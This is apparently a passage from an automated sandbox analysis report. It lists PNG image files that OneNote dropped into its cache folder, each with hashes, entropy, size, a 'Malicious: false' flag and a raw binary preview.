Preview:	.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r\|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..\|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002B.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11332
Entropy (8bit):	7.9324721568775285
Encrypted:	false
SSDEEP:	192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
MD5:	31579CA3352DF8FA4E3E7F48C7CDF672
SHA1:	AA682A3C781BF8EE43B5EDC9718E64CB79135F25
SHA-256:	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
SHA-512:	782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b. &M.d-e... ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...\|....7...b...\|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..\|..[..g%(h.....W...?...UDh..T$..?....\|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,\|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?\|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002C.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.943341403425058
Encrypted:	false
SSDEEP:	96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
MD5:	817D5A35EDB2B0E052194D4F49FDA19C
SHA1:	FA6CB2016C5F43B76102B63D60359139227E07EA
SHA-256:	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
SHA-512:	E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
Malicious:	false
Preview:	.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b...%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....\|=.#.=.32..o.<.TnQ....g.zN...n...!/.........!....F..]...6...m...CX..~...+..U...E.\|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}.....N...N.\|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv\|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002D.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2599
Entropy (8bit):	7.903700862190034
Encrypted:	false
SSDEEP:	48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
MD5:	E88131C9AAC52649FF044905ACAB9B76
SHA1:	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
SHA-256:	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
SHA-512:	97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
Malicious:	false
Preview:	.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B\|E..>.....Q........b[.K........m.(..... ...!%1%-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.\|...Yszl.N.:......KPs.):).T.5...&B.....5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.\|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......\|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.\|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002E.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1570
Entropy (8bit):	7.780157858994452
Encrypted:	false
SSDEEP:	48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
MD5:	EF9AA5B2ADBE5DF68AC4F4D716DF7708
SHA1:	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
SHA-256:	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
SHA-512:	EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
Malicious:	false
Preview:	.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.>.E,;.....~..\|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&............Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~\|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er\|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.\|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D\|3t.-\g...Q

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002F.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4490
Entropy (8bit):	7.928016176674318
Encrypted:	false
SSDEEP:	96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
MD5:	7F161B19B937AB48D4FD2F6E5E16FDBD
SHA1:	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
SHA-256:	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
SHA-512:	E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
Malicious:	false
Preview:	.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.\|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.\|...\.z..6j>..n....Y.&G.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P.....'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^.....W..?}t...{.B.8..D...UPa..~..C...\|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.......G...K.....e...b.\|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002G.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11449
Entropy (8bit):	7.91552812501629
Encrypted:	false
SSDEEP:	192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
MD5:	163E6791C87E4999C343EC5E23843B15
SHA1:	43CE3BAE19E22876483A7FD0E93DB45790373600
SHA-256:	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
SHA-512:	98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....\|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E\|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.\|..\|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002H.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	7374
Entropy (8bit):	7.955141875077912
Encrypted:	false
SSDEEP:	192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
MD5:	70DAF02EC717AB54452FA4C707BCAC74
SHA1:	30F46FAC5E96470848C5A948162CC12455A05154
SHA-256:	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
SHA-512:	E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
Malicious:	false
Preview:	.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..\|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..\|.\|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6.............tb.9.j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G\|.......&..0ZK1u8.H.2...Z../..P(....BA..aL\|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.\|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002I.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19235
Entropy (8bit):	7.944867159042578
Encrypted:	false
SSDEEP:	384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
MD5:	AE32E846559D576FD263BD69FEDBEC28
SHA1:	D481DF71C858BAECFE33418002D368F2DCF68D4A
SHA-256:	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
SHA-512:	9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=\|z7.Z.\|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.u.j..S.C=...\|.....2..(YF........\|....7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002J.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2210
Entropy (8bit):	7.86853667196985
Encrypted:	false
SSDEEP:	48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
MD5:	73E38124F94AD20A2F1571FBBE11AEEC
SHA1:	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
SHA-256:	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
SHA-512:	320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
Malicious:	false
Preview:	.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1\|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B\|CW......sO..\.=..&3...,.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002K.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	7.837610270261933
Encrypted:	false
SSDEEP:	48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
MD5:	EDB5ED43CC6038500A54B90BEC493628
SHA1:	A8CD63F3914E4347F4C5552FB922C6C03917F45F
SHA-256:	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
SHA-512:	4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...........A..!.A.....R.Ai%YH..(M.".h.cf.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8...X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o\|%..7..'.....N.\|..Vi...q..uO,`/....\W{..y...&iI..\|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.\|....8..H......_...G...\|......;6YQ\|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002L.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13030
Entropy (8bit):	7.948664903731204
Encrypted:	false
SSDEEP:	384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
MD5:	17E9FF9F735102231846936F0E2BAF1A
SHA1:	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
SHA-256:	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
SHA-512:	71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
Malicious:	false
Preview:	.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .....z..\|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..pM......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002M.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14458
Entropy (8bit):	7.944094738048628
Encrypted:	false
SSDEEP:	384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
MD5:	7CEB71F78A193F8C9F7FFDA5F81AEBD8
SHA1:	EEC1597705EFF1A527C246B86A71878185BA6B1B
SHA-256:	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
SHA-512:	1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
Malicious:	false
Preview:	.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...dU...C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002N.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1657
Entropy (8bit):	7.80882577056055
Encrypted:	false
SSDEEP:	24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
MD5:	D5F7A65469623327F799B516ACBFFD2F
SHA1:	76C6333C14AF3A7EA091819953E6E12DC289A12C
SHA-256:	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
SHA-512:	351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
Malicious:	false
Preview:	.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..\|'.n.x...c....._O...[)......S..Q...d......A....4..t....E..v..}..7...t.b....,/\|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002O.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4847
Entropy (8bit):	7.950192613458318
Encrypted:	false
SSDEEP:	96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
MD5:	A1A1017A6A7928761CEB56D1D950E123
SHA1:	28272E9C7F816A1CE8F2033FC00F489005332365
SHA-256:	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
SHA-512:	10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
Malicious:	false
